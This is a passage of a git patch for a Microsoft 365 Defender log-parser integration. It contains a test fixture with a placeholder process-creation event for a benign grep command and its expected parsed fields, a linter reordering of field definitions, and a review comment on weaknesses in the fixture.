smtpd_tls_protocols\\\\commandtest\",\"FileName\":\"grep\",\"ProcessId\":408996,\"InitiatingProcessId\":408996,\"ProcessCreationTime\":\"2024-09-24T14:18:11.864114Z\",\"DeviceName\":\"testDevice\",\"DeviceId\":\"123412341234123412341234\",\"InitiatingProcessCreationTime\":\"2024-09-24T14:18:11.85Z\",\"InitiatingProcessAccountName\":\"testaccount\",\"InitiatingProcessAccountDomain\":\"testdomain\",\"InitiatingProcessAccountSid\":null,\"InitiatingProcessSignatureStatus\":\"Unknown\",\"InitiatingProcessSignerType\":\"Unknown\",\"InitiatingProcessParentId\":408229,\"ReportId\":49226,\"InitiatingProcessParentCreationTime\":\"2024-09-24T14:17:34.79Z\",\"InitiatingProcessTokenElevation\":\"None\",\"InitiatingProcessIntegrityLevel\":null,\"AccountDomain\":\"testDomain\",\"AccountName\":\"testaccount\",\"ProcessTokenElevation\":\"None\",\"ProcessIntegrityLevel\":null,\"AccountSid\":null,\"AppGuardContainerId\":null,\"SHA256\":\"8def33333333643356354032379388263138839b9503f269f82e978413d669a0\",\"InitiatingProcessSHA256\":\"3aa8333873527333382433308d52333230354923305566335f7e9f0a732ea565\",\"InitiatingProcessLogonId\":0,\"LogonId\":0,\"InitiatingProcessAccountUpn\":null,\"InitiatingProcessAccountObjectId\":null,\"AccountUpn\":null,\"AccountObjectId\":null,\"AdditionalFields\":\"{\\\"InitiatingProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"testname\\\",\\\"DomainName\\\":\\\"testDomain\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"testname\\\",\\\"PosixGroupId\\\":0}},\\\"InitiatingProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"testname\\\",\\\"PosixGroupId\\\":0},\\\"InitiatingProcessPosixProcessGroupId\\\":408125,\\\"InitiatingProcessPosixSessionId\\\":0,\\\"InitiatingProcessPosixFilePermissions\\\":[\\\"OthersExecute\\\",\\\"OthersRead\\\",\\\"GroupExecute\\\",\\\"GroupRead\\\",\\\"UserExecute\\\",\\\"UserWrite\\\",\\\"UserRead\\\",\\\"UserAll\\\"],\\\"InitiatingProcessPosixUserOwner\\\":{\\\"Name\\\":\\\"testname\\\",\\\"DomainN
ame\\\":\\\"TestDomain\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"testname\\\",\\\"PosixGroupId\\\":0}},\\\"InitiatingProcessPosixGroupOwner\\\":{\\\"Name\\\":\\\"testname\\\",\\\"PosixGroupId\\\":0},\\\"InitiatingProcessPosixRealUser\\\":{\\\"Name\\\":\\\"testname\\\",\\\"DomainName\\\":\\\"TestDomain\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"testname\\\",\\\"PosixGroupId\\\":0}},\\\"ProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"testname\\\",\\\"DomainName\\\":\\\"TestDomain\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"testname\\\",\\\"PosixGroupId\\\":0}},\\\"ProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"testname\\\",\\\"PosixGroupId\\\":0},\\\"ProcessPosixProcessGroupId\\\":408125,\\\"ProcessPosixSessionId\\\":408125,\\\"ProcessCurrentWorkingDirectory\\\":\\\"/testname\\\",\\\"ProcessPosixFilePermissions\\\":[\\\"OthersExecute\\\",\\\"OthersRead\\\",\\\"GroupExecute\\\",\\\"GroupRead\\\",\\\"UserExecute\\\",\\\"UserWrite\\\",\\\"UserRead\\\",\\\"UserAll\\\"],\\\"ProcessPosixFileUserOwner\\\":{\\\"Name\\\":\\\"testname\\\",\\\"DomainName\\\":\\\"TestDomain\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"testname\\\",\\\"PosixGroupId\\\":0}},\\\"ProcessPosixFileGroupOwner\\\":{\\\"Name\\\":\\\"testname\\\",\\\"PosixGroupId\\\":0}}\",\"InitiatingProcessVersionInfoCompanyName\":null,\"InitiatingProcessVersionInfoProductName\":null,\"InitiatingProcessVersionInfoProductVersion\":null,\"InitiatingProcessVersionInfoInternalFileName\":null,\"InitiatingProcessVersionInfoOriginalFileName\":null,\"InitiatingProcessVersionInfoFileDescription\":null,\"ProcessVersionInfoCompanyName\":null,\"ProcessVersionInfoProductName\":null,\"ProcessVersionInfoProductVersion\":null,\"ProcessVersionInfoInternalFileName\":null,\"ProcessVersionInfoOriginalFileName\":null,\"ProcessVersionInfoFileDescription\":null,\"Ini
tiatingProcessSessionId\":null,\"CreatedProcessSessionId\":null,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"ActionType\":\"ProcessCreated\",\"Timestamp\":\"2024-09-24T14:18:11.864114Z\",\"MachineGroup\":\"test Group\"},\"Tenant\":\"DefaultTenant\"}" + }, + "expected": { + "message": "{\"time\":\"2024-09-24T14:19:47.7143361Z\",\"tenantId\":\"16ffffff-0000-3333-8888-addddddddd\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceProcessEvents\",\"_TimeReceivedBySvc\":\"2024-09-24T14:18:24.0670725Z\",\"properties\":{\"InitiatingProcessSHA1\":\"ff77777000aaaaaaaaaffb100000c0fb25ccccc6\",\"InitiatingProcessFileSize\":11864,\"InitiatingProcessMD5\":\"eeeee2999444ddaaaaa08598b06eafe7\",\"InitiatingProcessFileName\":\"platform-python3.6\",\"InitiatingProcessParentFileName\":\"platform-python3.6\",\"InitiatingProcessFolderPath\":\"/usr/test/platform-python3.6\",\"InitiatingProcessCommandLine\":\"/usr/test/platform-python /usr/lib/python3.6/run.py --register\",\"SHA1\":\"ff000000000aaaaaaaaaffb100000c0fb25ccccc6\",\"FileSize\":193333,\"MD5\":\"ff000000000aaaaaaaaaffb100000c0fb25ccccc6\",\"FolderPath\":\"/usr/bin/grep\",\"ProcessCommandLine\":\"grep -F 
smtpd_tls_protocols\\\\commandtest\",\"FileName\":\"grep\",\"ProcessId\":408996,\"InitiatingProcessId\":408996,\"ProcessCreationTime\":\"2024-09-24T14:18:11.864114Z\",\"DeviceName\":\"testDevice\",\"DeviceId\":\"123412341234123412341234\",\"InitiatingProcessCreationTime\":\"2024-09-24T14:18:11.85Z\",\"InitiatingProcessAccountName\":\"testaccount\",\"InitiatingProcessAccountDomain\":\"testdomain\",\"InitiatingProcessAccountSid\":null,\"InitiatingProcessSignatureStatus\":\"Unknown\",\"InitiatingProcessSignerType\":\"Unknown\",\"InitiatingProcessParentId\":408229,\"ReportId\":49226,\"InitiatingProcessParentCreationTime\":\"2024-09-24T14:17:34.79Z\",\"InitiatingProcessTokenElevation\":\"None\",\"InitiatingProcessIntegrityLevel\":null,\"AccountDomain\":\"testDomain\",\"AccountName\":\"testaccount\",\"ProcessTokenElevation\":\"None\",\"ProcessIntegrityLevel\":null,\"AccountSid\":null,\"AppGuardContainerId\":null,\"SHA256\":\"8def33333333643356354032379388263138839b9503f269f82e978413d669a0\",\"InitiatingProcessSHA256\":\"3aa8333873527333382433308d52333230354923305566335f7e9f0a732ea565\",\"InitiatingProcessLogonId\":0,\"LogonId\":0,\"InitiatingProcessAccountUpn\":null,\"InitiatingProcessAccountObjectId\":null,\"AccountUpn\":null,\"AccountObjectId\":null,\"AdditionalFields\":\"{\\\"InitiatingProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"testname\\\",\\\"DomainName\\\":\\\"testDomain\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"testname\\\",\\\"PosixGroupId\\\":0}},\\\"InitiatingProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"testname\\\",\\\"PosixGroupId\\\":0},\\\"InitiatingProcessPosixProcessGroupId\\\":408125,\\\"InitiatingProcessPosixSessionId\\\":0,\\\"InitiatingProcessPosixFilePermissions\\\":[\\\"OthersExecute\\\",\\\"OthersRead\\\",\\\"GroupExecute\\\",\\\"GroupRead\\\",\\\"UserExecute\\\",\\\"UserWrite\\\",\\\"UserRead\\\",\\\"UserAll\\\"],\\\"InitiatingProcessPosixUserOwner\\\":{\\\"Name\\\":\\\"testname\\\",\\\"DomainN
ame\\\":\\\"TestDomain\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"testname\\\",\\\"PosixGroupId\\\":0}},\\\"InitiatingProcessPosixGroupOwner\\\":{\\\"Name\\\":\\\"testname\\\",\\\"PosixGroupId\\\":0},\\\"InitiatingProcessPosixRealUser\\\":{\\\"Name\\\":\\\"testname\\\",\\\"DomainName\\\":\\\"TestDomain\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"testname\\\",\\\"PosixGroupId\\\":0}},\\\"ProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"testname\\\",\\\"DomainName\\\":\\\"TestDomain\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"testname\\\",\\\"PosixGroupId\\\":0}},\\\"ProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"testname\\\",\\\"PosixGroupId\\\":0},\\\"ProcessPosixProcessGroupId\\\":408125,\\\"ProcessPosixSessionId\\\":408125,\\\"ProcessCurrentWorkingDirectory\\\":\\\"/testname\\\",\\\"ProcessPosixFilePermissions\\\":[\\\"OthersExecute\\\",\\\"OthersRead\\\",\\\"GroupExecute\\\",\\\"GroupRead\\\",\\\"UserExecute\\\",\\\"UserWrite\\\",\\\"UserRead\\\",\\\"UserAll\\\"],\\\"ProcessPosixFileUserOwner\\\":{\\\"Name\\\":\\\"testname\\\",\\\"DomainName\\\":\\\"TestDomain\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"testname\\\",\\\"PosixGroupId\\\":0}},\\\"ProcessPosixFileGroupOwner\\\":{\\\"Name\\\":\\\"testname\\\",\\\"PosixGroupId\\\":0}}\",\"InitiatingProcessVersionInfoCompanyName\":null,\"InitiatingProcessVersionInfoProductName\":null,\"InitiatingProcessVersionInfoProductVersion\":null,\"InitiatingProcessVersionInfoInternalFileName\":null,\"InitiatingProcessVersionInfoOriginalFileName\":null,\"InitiatingProcessVersionInfoFileDescription\":null,\"ProcessVersionInfoCompanyName\":null,\"ProcessVersionInfoProductName\":null,\"ProcessVersionInfoProductVersion\":null,\"ProcessVersionInfoInternalFileName\":null,\"ProcessVersionInfoOriginalFileName\":null,\"ProcessVersionInfoFileDescription\":null,\"Ini
tiatingProcessSessionId\":null,\"CreatedProcessSessionId\":null,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"ActionType\":\"ProcessCreated\",\"Timestamp\":\"2024-09-24T14:18:11.864114Z\",\"MachineGroup\":\"test Group\"},\"Tenant\":\"DefaultTenant\"}", + "event": { + "category": [ + "process" + ], + "dataset": "device_process_events", + "type": [ + "info" + ] + }, + "@timestamp": "2024-09-24T14:18:11.864114Z", + "action": { + "properties": { + "InitiatingProcessCommandLine": "/usr/test/platform-python /usr/lib/python3.6/run.py --register", + "InitiatingProcessFileSize": 11864, + "InitiatingProcessLogonId": "0", + "LogonId": "0" + }, + "type": "ProcessCreated" + }, + "file": { + "directory": "/usr/bin/grep", + "hash": { + "md5": "ff000000000aaaaaaaaaffb100000c0fb25ccccc6", + "sha1": "ff000000000aaaaaaaaaffb100000c0fb25ccccc6", + "sha256": "8def33333333643356354032379388263138839b9503f269f82e978413d669a0" + }, + "name": "grep", + "size": 193333 + }, + "host": { + "id": "123412341234123412341234", + "name": "testDevice" + }, + "microsoft": { + "defender": { + "report": { + "id": "49226" + } + } + }, + "process": { + "args": [ + "-F", + "smtpd_tls_protocols\\commandtest" + ], + "code_signature": { + "status": "Unknown", + "subject_name": "Unknown" + }, + "command_line": "grep -F smtpd_tls_protocols\\commandtest", + "executable": "/usr/bin/grep", + "hash": { + "md5": "ff000000000aaaaaaaaaffb100000c0fb25ccccc6", + "sha1": "ff000000000aaaaaaaaaffb100000c0fb25ccccc6", + "sha256": "8def33333333643356354032379388263138839b9503f269f82e978413d669a0" + }, + "name": "grep", + "parent": { + "command_line": "/usr/test/platform-python /usr/lib/python3.6/run.py --register", + "executable": "/usr/test/platform-python3.6", + "name": "platform-python3.6", + "pid": 408996, + "start": 
"2024-09-24T14:18:11.850000Z", + "user": { + "domain": "testdomain", + "name": "testaccount" + }, + "working_directory": "/usr/test" + }, + "pid": 408996, + "start": "2024-09-24T14:18:11.864114Z" + }, + "related": { + "hash": [ + "8def33333333643356354032379388263138839b9503f269f82e978413d669a0", + "ff000000000aaaaaaaaaffb100000c0fb25ccccc6" + ], + "user": [ + "testaccount" + ] + }, + "user": { + "domain": "testDomain", + "name": "testaccount" + } + } +} \ No newline at end of file From 3542992e5e8802c100a29bc69d866ae366410be2 Mon Sep 17 00:00:00 2001 From: TOUFIKI Zakarya Date: Wed, 2 Oct 2024 12:18:01 +0200 Subject: [PATCH 102/317] Apply linter --- .../microsoft-365-defender/_meta/fields.yml | 46 ++++++++++--------- .../tests/test_process_error.json | 4 +- 2 files changed, 26 insertions(+), 24 deletions(-) diff --git a/Microsoft/microsoft-365-defender/_meta/fields.yml b/Microsoft/microsoft-365-defender/_meta/fields.yml index d2c57d50a..89168f3cf 100644 --- a/Microsoft/microsoft-365-defender/_meta/fields.yml +++ b/Microsoft/microsoft-365-defender/_meta/fields.yml 
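Review bot: The fixture cannot detect a swapped mapping for exactly the fields this commit re-routes: `ProcessId` and `InitiatingProcessId` are both 408996, so `process.pid` and `process.parent.pid` are indistinguishable, and `MD5` holds the same 40-hex-digit value as `SHA1` (an MD5 digest is 32 hex digits), so crossed `process.hash.md5`/`sha1` or `file.hash.md5`/`sha1` would still pass and the de-duplicated `related.hash` list hides it further. Give the initiating process a distinct pid and `MD5` a distinct 32-hex value, then update the expected `process.parent.pid`, `process.hash.md5`, `file.hash.md5` and `related.hash` accordingly. The expected `file.directory` is `/usr/bin/grep`, i.e. the full path rather than `/usr/bin` — presumably taken verbatim from `FolderPath`; worth confirming that is intended before pinning it in a test.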
@@ -816,6 +816,30 @@ microsoft.defender.threat.types: name: microsoft.defender.threat.types type: keyword +process.parent.user.domain: + description: Domain of the account that ran the parent process responsible for the + event + name: process.parent.user.domain + type: keyword + +process.parent.user.email: + description: User principal name (UPN) of the account that ran the parent process + responsible for the event + name: process.parent.user.email + type: keyword + +process.parent.user.id: + description: Security Identifier (SID) of the account that ran the parent process + responsible for the event + name: process.parent.user.id + type: keyword + +process.parent.user.name: + description: User name of the account that ran the parent process responsible for + the event + name: process.parent.user.name + type: keyword + process.user.domain: description: Domain of the account that ran the process responsible for the event name: process.user.domain @@ -837,25 +861,3 @@ process.user.name: description: User name of the account that ran the process responsible for the event name: process.user.name type: keyword - -process.parent.user.domain: - description: Domain of the account that ran the parent process responsible for the event - name: process.parent.user.domain - type: keyword - -process.parent.user.email: - description: User principal name (UPN) of the account that ran the parent process responsible - for the event - name: process.parent.user.email - type: keyword - -process.parent.user.id: - description: Security Identifier (SID) of the account that ran the parent process responsible - for the event - name: process.parent.user.id - type: keyword - -process.parent.user.name: - description: User name of the account that ran the parent process responsible for the event - name: process.parent.user.name - type: keyword 
diff --git a/Microsoft/microsoft-365-defender/tests/test_process_error.json b/Microsoft/microsoft-365-defender/tests/test_process_error.json index 934585ad4..c1b661620 100644 --- a/Microsoft/microsoft-365-defender/tests/test_process_error.json +++ b/Microsoft/microsoft-365-defender/tests/test_process_error.json 
@@ -1,12 +1,12 @@ { "input": { + "message": "{\"time\":\"2024-09-24T14:19:47.7143361Z\",\"tenantId\":\"16ffffff-0000-3333-8888-addddddddd\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceProcessEvents\",\"_TimeReceivedBySvc\":\"2024-09-24T14:18:24.0670725Z\",\"properties\":{\"InitiatingProcessSHA1\":\"ff77777000aaaaaaaaaffb100000c0fb25ccccc6\",\"InitiatingProcessFileSize\":11864,\"InitiatingProcessMD5\":\"eeeee2999444ddaaaaa08598b06eafe7\",\"InitiatingProcessFileName\":\"platform-python3.6\",\"InitiatingProcessParentFileName\":\"platform-python3.6\",\"InitiatingProcessFolderPath\":\"/usr/test/platform-python3.6\",\"InitiatingProcessCommandLine\":\"/usr/test/platform-python /usr/lib/python3.6/run.py --register\",\"SHA1\":\"ff000000000aaaaaaaaaffb100000c0fb25ccccc6\",\"FileSize\":193333,\"MD5\":\"ff000000000aaaaaaaaaffb100000c0fb25ccccc6\",\"FolderPath\":\"/usr/bin/grep\",\"ProcessCommandLine\":\"grep -F smtpd_tls_protocols\\\\commandtest\",\"FileName\":\"grep\",\"ProcessId\":408996,\"InitiatingProcessId\":408996,\"ProcessCreationTime\":\"2024-09-24T14:18:11.864114Z\",\"DeviceName\":\"testDevice\",\"DeviceId\":\"123412341234123412341234\",\"InitiatingProcessCreationTime\":\"2024-09-24T14:18:11.85Z\",\"InitiatingProcessAccountName\":\"testaccount\",\"InitiatingProcessAccountDomain\":\"testdomain\",\"InitiatingProcessAccountSid\":null,\"InitiatingProcessSignatureStatus\":\"Unknown\",\"InitiatingProcessSignerType\":\"Unknown\",\"InitiatingProcessParentId\":408229,\"ReportId\":49226,\"InitiatingProcessParentCreationTime\":\"2024-09-24T14:17:34.79Z\",\"InitiatingProcessTokenElevation\":\"None\",\"InitiatingProcessIntegrityLevel\":null,\"AccountDomain\":\"testDomain\",\"AccountName\":\"testaccount\",\"ProcessTokenElevation\":\"None\",\"ProcessIntegrityLevel\":null,\"AccountSid\":null,\"AppGuardContainerId\":null,\"SHA256\":\"8def33333333643356354032379388263138839b9503f269f82e978413d669a0\",\"InitiatingProcessSHA256\":\"3aa8333873527333382433308d52333230
354923305566335f7e9f0a732ea565\",\"InitiatingProcessLogonId\":0,\"LogonId\":0,\"InitiatingProcessAccountUpn\":null,\"InitiatingProcessAccountObjectId\":null,\"AccountUpn\":null,\"AccountObjectId\":null,\"AdditionalFields\":\"{\\\"InitiatingProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"testname\\\",\\\"DomainName\\\":\\\"testDomain\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"testname\\\",\\\"PosixGroupId\\\":0}},\\\"InitiatingProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"testname\\\",\\\"PosixGroupId\\\":0},\\\"InitiatingProcessPosixProcessGroupId\\\":408125,\\\"InitiatingProcessPosixSessionId\\\":0,\\\"InitiatingProcessPosixFilePermissions\\\":[\\\"OthersExecute\\\",\\\"OthersRead\\\",\\\"GroupExecute\\\",\\\"GroupRead\\\",\\\"UserExecute\\\",\\\"UserWrite\\\",\\\"UserRead\\\",\\\"UserAll\\\"],\\\"InitiatingProcessPosixUserOwner\\\":{\\\"Name\\\":\\\"testname\\\",\\\"DomainName\\\":\\\"TestDomain\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"testname\\\",\\\"PosixGroupId\\\":0}},\\\"InitiatingProcessPosixGroupOwner\\\":{\\\"Name\\\":\\\"testname\\\",\\\"PosixGroupId\\\":0},\\\"InitiatingProcessPosixRealUser\\\":{\\\"Name\\\":\\\"testname\\\",\\\"DomainName\\\":\\\"TestDomain\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"testname\\\",\\\"PosixGroupId\\\":0}},\\\"ProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"testname\\\",\\\"DomainName\\\":\\\"TestDomain\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"testname\\\",\\\"PosixGroupId\\\":0}},\\\"ProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"testname\\\",\\\"PosixGroupId\\\":0},\\\"ProcessPosixProcessGroupId\\\":408125,\\\"ProcessPosixSessionId\\\":408125,\\\"ProcessCurrentWorkingDirectory\\\":\\\"/testname\\\",\\\"ProcessPosixFilePermissions\\\":[\\\"OthersExecute\\\",\\\"OthersRead\\\",\\\"GroupExecute\\\",\\\"GroupRead\\\",\\\"UserExecute\\\",\
\\"UserWrite\\\",\\\"UserRead\\\",\\\"UserAll\\\"],\\\"ProcessPosixFileUserOwner\\\":{\\\"Name\\\":\\\"testname\\\",\\\"DomainName\\\":\\\"TestDomain\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"testname\\\",\\\"PosixGroupId\\\":0}},\\\"ProcessPosixFileGroupOwner\\\":{\\\"Name\\\":\\\"testname\\\",\\\"PosixGroupId\\\":0}}\",\"InitiatingProcessVersionInfoCompanyName\":null,\"InitiatingProcessVersionInfoProductName\":null,\"InitiatingProcessVersionInfoProductVersion\":null,\"InitiatingProcessVersionInfoInternalFileName\":null,\"InitiatingProcessVersionInfoOriginalFileName\":null,\"InitiatingProcessVersionInfoFileDescription\":null,\"ProcessVersionInfoCompanyName\":null,\"ProcessVersionInfoProductName\":null,\"ProcessVersionInfoProductVersion\":null,\"ProcessVersionInfoInternalFileName\":null,\"ProcessVersionInfoOriginalFileName\":null,\"ProcessVersionInfoFileDescription\":null,\"InitiatingProcessSessionId\":null,\"CreatedProcessSessionId\":null,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"ActionType\":\"ProcessCreated\",\"Timestamp\":\"2024-09-24T14:18:11.864114Z\",\"MachineGroup\":\"test Group\"},\"Tenant\":\"DefaultTenant\"}", "sekoiaio": { "intake": { "dialect": "Microsoft 365 Defender", "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f" } - }, - "message": 
"{\"time\":\"2024-09-24T14:19:47.7143361Z\",\"tenantId\":\"16ffffff-0000-3333-8888-addddddddd\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceProcessEvents\",\"_TimeReceivedBySvc\":\"2024-09-24T14:18:24.0670725Z\",\"properties\":{\"InitiatingProcessSHA1\":\"ff77777000aaaaaaaaaffb100000c0fb25ccccc6\",\"InitiatingProcessFileSize\":11864,\"InitiatingProcessMD5\":\"eeeee2999444ddaaaaa08598b06eafe7\",\"InitiatingProcessFileName\":\"platform-python3.6\",\"InitiatingProcessParentFileName\":\"platform-python3.6\",\"InitiatingProcessFolderPath\":\"/usr/test/platform-python3.6\",\"InitiatingProcessCommandLine\":\"/usr/test/platform-python /usr/lib/python3.6/run.py --register\",\"SHA1\":\"ff000000000aaaaaaaaaffb100000c0fb25ccccc6\",\"FileSize\":193333,\"MD5\":\"ff000000000aaaaaaaaaffb100000c0fb25ccccc6\",\"FolderPath\":\"/usr/bin/grep\",\"ProcessCommandLine\":\"grep -F smtpd_tls_protocols\\\\commandtest\",\"FileName\":\"grep\",\"ProcessId\":408996,\"InitiatingProcessId\":408996,\"ProcessCreationTime\":\"2024-09-24T14:18:11.864114Z\",\"DeviceName\":\"testDevice\",\"DeviceId\":\"123412341234123412341234\",\"InitiatingProcessCreationTime\":\"2024-09-24T14:18:11.85Z\",\"InitiatingProcessAccountName\":\"testaccount\",\"InitiatingProcessAccountDomain\":\"testdomain\",\"InitiatingProcessAccountSid\":null,\"InitiatingProcessSignatureStatus\":\"Unknown\",\"InitiatingProcessSignerType\":\"Unknown\",\"InitiatingProcessParentId\":408229,\"ReportId\":49226,\"InitiatingProcessParentCreationTime\":\"2024-09-24T14:17:34.79Z\",\"InitiatingProcessTokenElevation\":\"None\",\"InitiatingProcessIntegrityLevel\":null,\"AccountDomain\":\"testDomain\",\"AccountName\":\"testaccount\",\"ProcessTokenElevation\":\"None\",\"ProcessIntegrityLevel\":null,\"AccountSid\":null,\"AppGuardContainerId\":null,\"SHA256\":\"8def33333333643356354032379388263138839b9503f269f82e978413d669a0\",\"InitiatingProcessSHA256\":\"3aa8333873527333382433308d52333230354923305566335f7e9f0a732ea565\",\"Initiatin
gProcessLogonId\":0,\"LogonId\":0,\"InitiatingProcessAccountUpn\":null,\"InitiatingProcessAccountObjectId\":null,\"AccountUpn\":null,\"AccountObjectId\":null,\"AdditionalFields\":\"{\\\"InitiatingProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"testname\\\",\\\"DomainName\\\":\\\"testDomain\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"testname\\\",\\\"PosixGroupId\\\":0}},\\\"InitiatingProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"testname\\\",\\\"PosixGroupId\\\":0},\\\"InitiatingProcessPosixProcessGroupId\\\":408125,\\\"InitiatingProcessPosixSessionId\\\":0,\\\"InitiatingProcessPosixFilePermissions\\\":[\\\"OthersExecute\\\",\\\"OthersRead\\\",\\\"GroupExecute\\\",\\\"GroupRead\\\",\\\"UserExecute\\\",\\\"UserWrite\\\",\\\"UserRead\\\",\\\"UserAll\\\"],\\\"InitiatingProcessPosixUserOwner\\\":{\\\"Name\\\":\\\"testname\\\",\\\"DomainName\\\":\\\"TestDomain\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"testname\\\",\\\"PosixGroupId\\\":0}},\\\"InitiatingProcessPosixGroupOwner\\\":{\\\"Name\\\":\\\"testname\\\",\\\"PosixGroupId\\\":0},\\\"InitiatingProcessPosixRealUser\\\":{\\\"Name\\\":\\\"testname\\\",\\\"DomainName\\\":\\\"TestDomain\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"testname\\\",\\\"PosixGroupId\\\":0}},\\\"ProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"testname\\\",\\\"DomainName\\\":\\\"TestDomain\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"testname\\\",\\\"PosixGroupId\\\":0}},\\\"ProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"testname\\\",\\\"PosixGroupId\\\":0},\\\"ProcessPosixProcessGroupId\\\":408125,\\\"ProcessPosixSessionId\\\":408125,\\\"ProcessCurrentWorkingDirectory\\\":\\\"/testname\\\",\\\"ProcessPosixFilePermissions\\\":[\\\"OthersExecute\\\",\\\"OthersRead\\\",\\\"GroupExecute\\\",\\\"GroupRead\\\",\\\"UserExecute\\\",\\\"UserWrite\\\",\\\"UserRead\\\",\\\"UserAl
l\\\"],\\\"ProcessPosixFileUserOwner\\\":{\\\"Name\\\":\\\"testname\\\",\\\"DomainName\\\":\\\"TestDomain\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"testname\\\",\\\"PosixGroupId\\\":0}},\\\"ProcessPosixFileGroupOwner\\\":{\\\"Name\\\":\\\"testname\\\",\\\"PosixGroupId\\\":0}}\",\"InitiatingProcessVersionInfoCompanyName\":null,\"InitiatingProcessVersionInfoProductName\":null,\"InitiatingProcessVersionInfoProductVersion\":null,\"InitiatingProcessVersionInfoInternalFileName\":null,\"InitiatingProcessVersionInfoOriginalFileName\":null,\"InitiatingProcessVersionInfoFileDescription\":null,\"ProcessVersionInfoCompanyName\":null,\"ProcessVersionInfoProductName\":null,\"ProcessVersionInfoProductVersion\":null,\"ProcessVersionInfoInternalFileName\":null,\"ProcessVersionInfoOriginalFileName\":null,\"ProcessVersionInfoFileDescription\":null,\"InitiatingProcessSessionId\":null,\"CreatedProcessSessionId\":null,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"ActionType\":\"ProcessCreated\",\"Timestamp\":\"2024-09-24T14:18:11.864114Z\",\"MachineGroup\":\"test Group\"},\"Tenant\":\"DefaultTenant\"}" + } }, "expected": { "message": 
